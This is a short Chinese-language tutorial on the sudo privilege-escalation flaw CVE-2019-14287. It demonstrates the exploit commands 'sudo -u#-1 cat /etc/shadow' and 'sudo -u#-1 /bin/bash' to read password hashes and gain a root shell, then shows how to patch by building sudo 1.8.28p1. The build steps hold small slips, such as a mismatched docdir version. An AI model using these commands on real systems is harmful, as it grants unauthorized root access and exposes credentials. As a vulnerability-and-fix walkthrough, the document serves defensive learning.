CVE-2019-14287漏洞与修复过程

CVE-2019-14287漏洞

CVE-2019-14287本地提权漏洞，漏洞因为是Sudo<1.8.28，只需要升级sudo>1.8.28的就可以修复完成

展示

1. 使用root用户修改权限文件：vim /etc/sudoers ，添加如下：

chen ALL=(ALL,!root) ALL

2. 添加用户：chen， chen ，

Useradd chen
Passwd chen

3. 使用chen用户查看文件是没有权限的： cat /etc/shadow ；
   
4. 使用命令， sudo -u#-1 cat /etc/shadow ；
   可以看到，chen用户被提权看到这个文件的内容
   
5. 查看当前登录的用户：whoami ；
   是为：chen
   6.，chen用户使用命令： ** sudo -u#-1 /bin/bash**；
   再次输入whoami，直接是root用户
   7.再使用命令： su root ，
   直接不需要密码，直接提权了，变成了root用户
   

修复漏洞

1.下载修复的包：wget http://www.sudo.ws/dist/sudo-1.8.28p1.tar.gz


2.解压：tar -zxvf sudo-1.8.28p1.tar.gz
3.进入目录：cd sudo-1.8.28p1 ; 然后安装

/configure --prefix=/usr              \
            --libexecdir=/usr/lib      \
            --with-secure-path         \
            --with-all-insults         \
            --with-env-editor          \
            --docdir=/usr/share/doc/sudo-1.9.2 \
            --with-passprompt="[sudo] password for %p: " &&
make

4.再执行：make install && ln -sfv libsudo_util.so.0.0.0 /usr/lib/sudo/libsudo_util.so.0
5.修复成功